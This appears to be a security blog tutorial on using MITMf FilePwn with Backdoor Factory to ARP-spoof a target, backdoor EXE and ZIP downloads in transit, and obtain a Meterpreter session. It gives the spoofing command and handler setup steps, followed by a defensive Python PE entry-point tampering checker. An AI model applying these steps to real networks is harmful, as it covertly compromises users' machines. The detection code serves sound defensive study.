Dropping Malware with MITMf FilePwn | Lucideus Research

Introduction

FilePwn: Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
Suppose your target is downloading files and you want to deliver a payload without the target noticing anything. FilePwn allows exactly this: it patches EXE and ZIP files with our payload while they are in transit, so the user downloads the file they asked for, but bound to it is our payload as well.
Workflow:
Target downloads an EXE or ZIP file
-> File is intercepted by MITMf FilePwn
-> Our payload is bound to the original file
-> User executes the file he/she downloaded
-> Our payload executes and then the original EXE is executed


Working
FilePwn is actually based on two other tools:
  • The Backdoor Factory
  • BDFProxy
The Backdoor Factory
The goal of BDF is to patch executable binaries with user-desired shellcode and continue normal execution of the pre-patched state.
BDFProxy
BDFProxy intercepts EXE and ZIP files from a man-in-the-middle (MITM) position.
PoC
  • Set up a virtual environment for MITMf
    mkvirtualenv MITMf -p /usr/bin/python2.7
    This step is only required if MITMf is installed from GitHub

  • Start Metasploit-Framework and load the msgrpc module
  • Locate and edit mitm.conf and change the MSGRPC password
  • Scroll down and change LHOST under the [[FilePwn]] section in mitm.conf

  • Start msfconsole and set up multi/handler
  • Start MITMf FilePwn
    python mitmf.py --spoof --arp -i eth0 --gateway IP --target IP --filepwn
  • Now build an EXE using the C programming language
  • Now let's upload this EXE to an HTTP-based free file-sharing website such as Zippyshare
  • Now we will try to download this EXE from the generated link

  • As soon as we start downloading this file we get logs in the MITMf terminal
  • After patching…
  • As soon as the target executes the EXE we get a Meterpreter session
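A defender-side check for the risk walked through above (an example added here, not code from the original article, MITMf or BDF): a binary patched in transit usually has its entry point redirected out of the original code section into appended or writable code, so parsing the PE section table of a downloaded file and flagging such entry points is a cheap way to spot tampering before execution. The PE headers below are constructed inline for the test, and the heuristic is an assumption about typical patching, not a description of BDF's internals.

```python
import struct

EXEC, WRITE = 0x20000000, 0x80000000  # IMAGE_SCN_MEM_EXECUTE / IMAGE_SCN_MEM_WRITE

def parse_pe(data):
    """Return (AddressOfEntryPoint, [(name, rva, size, characteristics), ...])."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file (missing MZ)")
    pe = struct.unpack_from("<I", data, 0x3C)[0]             # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE file (missing PE signature)")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]         # NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]    # SizeOfOptionalHeader
    entry = struct.unpack_from("<I", data, pe + 24 + 16)[0]  # AddressOfEntryPoint
    sec_off = pe + 24 + opt_size                             # start of section table
    sections = []
    for i in range(nsec):
        f = struct.unpack_from("<8sIIIIIIHHI", data, sec_off + 40 * i)
        sections.append((f[0].rstrip(b"\0").decode("latin-1"), f[2], max(f[1], f[3]), f[9]))
    return entry, sections

def entry_point_findings(data):
    """Heuristic (assumption): a patched binary tends to have its entry point
    moved out of the first executable section, often into a writable one."""
    entry, sections = parse_pe(data)
    holder = next((s for s in sections if s[1] <= entry < s[1] + s[2]), None)
    if holder is None:
        return ["entry point outside every section"]
    name, _, _, chars = holder
    findings = []
    first_exec = next((s for s in sections if s[3] & EXEC), None)
    if not chars & EXEC:
        findings.append(f"entry point in non-executable section {name}")
    elif holder is not first_exec:
        findings.append(f"entry point in {name}, not in first executable section {first_exec[0]}")
    if chars & WRITE and chars & EXEC:
        findings.append(f"section {name} is writable and executable")
    return findings

def build_pe(entry, sections):
    """Constructed minimal PE32 header for testing only (not a runnable binary)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)                      # e_lfanew = 64
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    opt = struct.pack("<HBB", 0x10B, 0, 0) + b"\0" * 12 + struct.pack("<I", entry)
    opt += b"\0" * (0xE0 - len(opt))
    table = b"".join(struct.pack("<8sIIIIIIHHI", n.encode(), sz, rva, sz, 0, 0, 0, 0, 0, ch)
                     for n, rva, sz, ch in sections)
    return dos + coff + opt + table

# Constructed samples: a normal layout, and one with an appended RWX section holding the entry point.
CLEAN = build_pe(0x1100, [(".text", 0x1000, 0x1000, EXEC | 0x20), (".data", 0x2000, 0x1000, 0x40 | WRITE)])
PATCHED = build_pe(0x3000, [(".text", 0x1000, 0x1000, EXEC | 0x20), (".data", 0x2000, 0x1000, 0x40 | WRITE),
                            (".new", 0x3000, 0x1000, EXEC | WRITE | 0x40)])
```

Run `entry_point_findings(open(path, "rb").read())` on a real download; an empty list means the entry point sits where a normal linker puts it, while any finding is a reason to compare the file against a hash obtained over a trusted channel before running it.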